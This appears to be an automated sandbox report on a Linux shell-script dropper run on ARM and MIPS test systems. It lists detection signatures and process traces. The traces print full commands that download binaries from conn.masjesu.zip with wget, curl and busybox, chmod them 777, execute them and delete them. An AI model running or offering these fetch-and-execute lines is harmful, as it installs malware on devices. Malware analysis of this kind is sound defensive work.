Analysis Overview
SHA256
cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca
Threat Level: Shows suspicious behavior
The file cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
System Network Configuration Discovery
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-20 03:24
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-20 03:24
Reported
2024-11-20 03:26
Platform
debian9-armhf-20240729-en
Max time kernel
148s
Max time network
3s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh
[/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-20 03:24
Reported
2024-11-20 03:27
Platform
debian9-mipsbe-20240418-en
Max time kernel
97s
Max time network
99s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG | /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG | N/A |
| N/A | /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx | /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx | N/A |
| N/A | /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx | /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx | N/A |
| N/A | /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa | /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa | N/A |
| N/A | /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN | /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN | N/A |
| N/A | /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 | /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 | N/A |
| N/A | /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 | /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 | N/A |
| N/A | /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 | /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 | N/A |
| N/A | /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT | /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT | N/A |
| N/A | /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz | /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz | N/A |
| N/A | /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx | /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx | N/A |
| N/A | /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m | /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m | N/A |
| N/A | /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS | /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS | N/A |
| N/A | /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh | /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh | N/A |
| N/A | /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 | /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 | N/A |
| N/A | /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG | /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG | N/A |
| N/A | /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx | /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx | N/A |
| N/A | /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx | /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx | N/A |
| N/A | /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa | /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa | N/A |
| N/A | /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN | /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN | N/A |
| N/A | /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 | /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 | N/A |
| N/A | /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 | /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 | N/A |
| N/A | /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT | /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT | N/A |
| N/A | /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh | /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh | N/A |
| N/A | /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz | /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz | N/A |
| N/A | /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx | /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx | N/A |
| N/A | /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m | /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m | N/A |
| N/A | /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS | /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx | /usr/bin/curl | N/A |
Processes
/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh
[/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
/bin/chmod
[chmod 777 WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
[./WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
/bin/rm
[rm WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]
/bin/chmod
[chmod 777 FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]
/tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
[./FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]
/bin/rm
[rm FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]
/bin/chmod
[chmod 777 JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]
/tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
[./JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]
/bin/rm
[rm JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]
/bin/chmod
[chmod 777 BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]
/tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
[./BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]
/bin/rm
[rm BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]
/bin/chmod
[chmod 777 tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]
/tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
[./tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]
/bin/rm
[rm tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]
/bin/chmod
[chmod 777 idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]
/tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
[./idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]
/bin/rm
[rm idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]
/bin/chmod
[chmod 777 mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]
/tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
[./mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]
/bin/rm
[rm mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]
/bin/chmod
[chmod 777 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]
/tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
[./4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]
/bin/rm
[rm 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]
/bin/chmod
[chmod 777 DQul2qKd09ITKkHJpETty8DirCA07F1nBT]
/tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT
[./DQul2qKd09ITKkHJpETty8DirCA07F1nBT]
/bin/rm
[rm DQul2qKd09ITKkHJpETty8DirCA07F1nBT]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]
/bin/chmod
[chmod 777 teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]
/tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
[./teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]
/bin/rm
[rm teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]
/bin/chmod
[chmod 777 PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]
/tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
[./PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]
/bin/rm
[rm PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]
/bin/chmod
[chmod 777 ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]
/tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
[./ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]
/bin/rm
[rm ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]
/bin/chmod
[chmod 777 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]
/tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
[./2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]
/bin/rm
[rm 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]
/bin/chmod
[chmod 777 zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]
/tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
[./zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]
/bin/rm
[rm zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]
/bin/chmod
[chmod 777 mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]
/tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
[./mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]
/bin/rm
[rm mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
/bin/chmod
[chmod 777 WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
[./WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
/bin/rm
[rm WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]
/bin/chmod
[chmod 777 FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]
/tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
[./FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]
/bin/rm
[rm FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]
/usr/bin/wget
